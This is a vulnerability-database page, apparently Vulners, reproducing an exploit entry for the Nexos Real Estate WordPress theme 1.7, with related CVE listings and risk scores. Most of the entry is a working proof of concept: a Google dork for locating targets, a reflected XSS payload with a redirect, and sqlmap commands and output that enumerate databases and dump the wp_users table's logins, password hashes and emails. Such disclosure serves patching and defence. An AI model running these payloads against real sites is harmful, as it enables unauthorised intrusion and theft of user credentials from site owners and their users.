Vulners
Lucene search
WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | WordPress NexosReal Estate 1.7 Theme - (search_order) SQL Injection Vulnerability | 22 Jul 202000:00 | – | zdt |
 | WordPress Nexos theme SQL Injection Vulnerability | 29 Jun 202000:00 | – | cnvd |
| WordPress Nexos theme cross-site scripting vulnerability | 29 Jun 202000:00 | – | cnvd |
 | CVE-2020-15363 | 28 Jun 202011:48 | – | cve |
| CVE-2020-15364 | 28 Jun 202011:47 | – | cve |
 | CVE-2020-15363 | 28 Jun 202011:48 | – | cvelist |
| CVE-2020-15364 | 28 Jun 202011:47 | – | cvelist |
 | WordPress Theme Nexos Real Estate SQL Injection | 5 Aug 202000:00 | – | dsquare |
 | EUVD-2020-7360 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-15363 | 28 Jun 202012:15 | – | nvd |
10
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection
# Google Dork: inurl:/wp-content/themes/nexos/
# Date: 2020-06-17
# Exploit Author: Vlad Vector
# Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ]
# Software Version: 1.7
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Tested on: Debian 10
# CVE: CVE-2020-15363, CVE-2020-15364
# CWE: CWE-79, CWE-89
### [ Info: ]
[i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection.
### [ Vulnerabilities: ]
[x] Unauthenticated Reflected XSS
[x] SQL Injection
### [ PoC Unauthenticated Reflected XSS: ]
[!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E>
[!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1
Host: listing-themes.com
### [ PoC SQL Injection: ]
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] geniuscr_nexos
[*] information_schema
[!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: TARGET-DB
Table: wp_users
[9 entries]
+--------------+------------------------------------+-------------------------+Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jul 2020 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 25
CVSS 3.19.8
EPSS0.14172